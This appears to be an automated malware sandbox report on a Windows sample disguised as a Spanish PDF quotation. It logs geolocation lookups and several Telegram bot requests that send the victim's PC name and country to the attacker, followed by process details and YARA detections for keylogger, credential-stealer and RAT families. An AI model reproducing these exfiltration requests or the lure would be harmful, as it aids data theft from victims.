9	192.168.2.5	49789	104.21.67.152	443	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:21 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 12:45:22 UTC	878	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:22 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514691 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w4IdASkBC0NfK5TSQ27lAbsZQNfeA42uyrxmw63k6NVLVxIVRdsrSfVkFpJVKuiQj%2FAYCVmZYMgPab9sy3SGJdYZyzEe5ldUeNgFwAuyrUQp5qV%2Fi3YVbw6ee1o1G5y8FEg%2B%2BKC7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3fe48dda8c81-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1973&rtt_var=745&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1463659&cwnd=235&unsent_bytes=0&cid=ccfb2373e83b84ff&ts=453&x=0"
2024-12-18 12:45:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49797	104.21.67.152	443	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:23 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 12:45:24 UTC	874	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514692 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WAu4ei0bwmGyIwteHDhbPFUfrqm5CIDZj3ZuzQ3kWWxJGFqzcXEpzVKumwIPwBHB4gsMbc27qWO%2Bj2LGTVBRAYreLMYAEynVDJ4MeWBPR18TnMamQhdAtJVaowZXfWgelPCeQ%2B1R"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3ff058f37d1a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1807&min_rtt=1799&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1564844&cwnd=179&unsent_bytes=0&cid=d8298cc0582c4248&ts=449&x=0"
2024-12-18 12:45:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49798	104.21.67.152	443	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:24 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 12:45:25 UTC	878	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514694 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lUwfK%2Bxp8LehWfaM7EvpQRIq4SHcHHKrAoLDbE2AQY8TERaCi34uDiLncBGA%2F70o9zvNuBXd54QtV8s9eDg6HLRRw8kKnI7RXU7dwNXv4sLXw%2FP692phcnzaJurI%2FckegfEBZa3P"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f3ff7db6e425c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1583&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1668571&cwnd=226&unsent_bytes=0&cid=787481d3c7a78a13&ts=459&x=0"
2024-12-18 12:45:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49805	149.154.167.220	443	6096	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:26 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2020/12/2024%20/%2005:55:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-18 12:45:27 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 18 Dec 2024 12:45:27 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 12:45:27 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49807	104.21.67.152	443	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:27 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 12:45:28 UTC	882	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514696 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FqXLUaf10HuW6H7B6DoUKz8oknMw653dqBw3hVTOAti5%2FG78etoZOjncgz6Q8mTo%2Fh9QA2Nv7PnQx14mUvpFAbtgekb%2FEgBwd8q4YlhQmkSwbyA6DfhDqGbJHafVo%2FroDi%2FKvQpB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f4009ebe8424b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1588&rtt_var=602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1808049&cwnd=248&unsent_bytes=0&cid=129c485202952e46&ts=455&x=0"
2024-12-18 12:45:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49818	104.21.67.152	443	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:30 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 12:45:31 UTC	876	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:31 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514700 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PrOut2YrJ28AXaZ2jAiJB9CwJdN7GI%2FwpBoP5V0WH21T%2BRERIzfz1FESdeoc95lIYQhSzZziX10xjE4gns%2BqYNMYhRTzVmC0tjoGxXOKCILGjtc91dYO8HVucMOXgts6m3HtVvkc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f401d3c1a238a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1823&min_rtt=1820&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1580086&cwnd=173&unsent_bytes=0&cid=838189eaf17154bc&ts=453&x=0"
2024-12-18 12:45:31 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49825	104.21.67.152	443	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:33 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 12:45:34 UTC	888	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514703 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qE%2BST9kpM8ZxYh0ArnoMknWjujcV6pjk0ncg9ua7aQuQrdUPRSoQHMRq34aqq8liH%2FU26liz6%2BU0DRCLoFXfNL%2BBohxiDKyuIYvh6DUd20U%2FWvyD2Jjgn%2F%2B15rHFdvBT%2BEoHa%2BJc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f4030f8b041d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1568&rtt_var=597&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1818181&cwnd=251&unsent_bytes=0&cid=01220fcbd2d9e32a&ts=501&x=0"
2024-12-18 12:45:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49844	104.21.67.152	443	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:39 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-18 12:45:39 UTC	880	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:39 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514708 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wQg%2F2sPwFHki112qu6vIOgHRuEGEHa3zT5eiXDALm2JEfKoz4sgvH2FbFXsUQSzclNfjf2%2FjcN535k5mLkNWq2tYo%2BIdIkPyD7GHOYmPw8srcHPnH%2BZVatdA%2FfHacg1Un1snGNhc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f405119cd0f71-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1475&min_rtt=1471&rtt_var=560&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1938911&cwnd=250&unsent_bytes=0&cid=b6372551fa1de3b3&ts=464&x=0"
2024-12-18 12:45:39 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49851	104.21.67.152	443	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:42 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-18 12:45:42 UTC	884	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:45:42 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 514711 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3gXFwIVrIQtDLpKyJSYvSE%2FNraXPNq%2FDVlDIajRUcNMytQCWWiFyHc2MrDhzH8%2B%2B%2BbYWXGexEh%2FJt1r9L8lwNLsxdLlKvsFXNc%2FCQfJs5mZtBIPBTEGN8slGaQtgxbvKVeaeIblv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f406668094370-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1666&min_rtt=1665&rtt_var=627&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1740166&cwnd=231&unsent_bytes=0&cid=12e0dbc7e591bb81&ts=466&x=0"
2024-12-18 12:45:42 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49857	149.154.167.220	443	4268	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:45:44 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2019/12/2024%20/%2013:25:24%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-18 12:45:44 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 18 Dec 2024 12:45:44 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 12:45:44 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	07:44:38
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe"
Imagebase:	0x200000
File size:	1'131'008 bytes
MD5 hash:	7D291DA9B6E5251A9A22673230884B5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:44:40
Start date:	18/12/2024
Path:	C:\Users\user\AppData\Local\silvexes\palladiums.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe"
Imagebase:	0x4f0000
File size:	1'131'008 bytes
MD5 hash:	7D291DA9B6E5251A9A22673230884B5F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2161545218.0000000003880000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:44:43
Start date:	18/12/2024
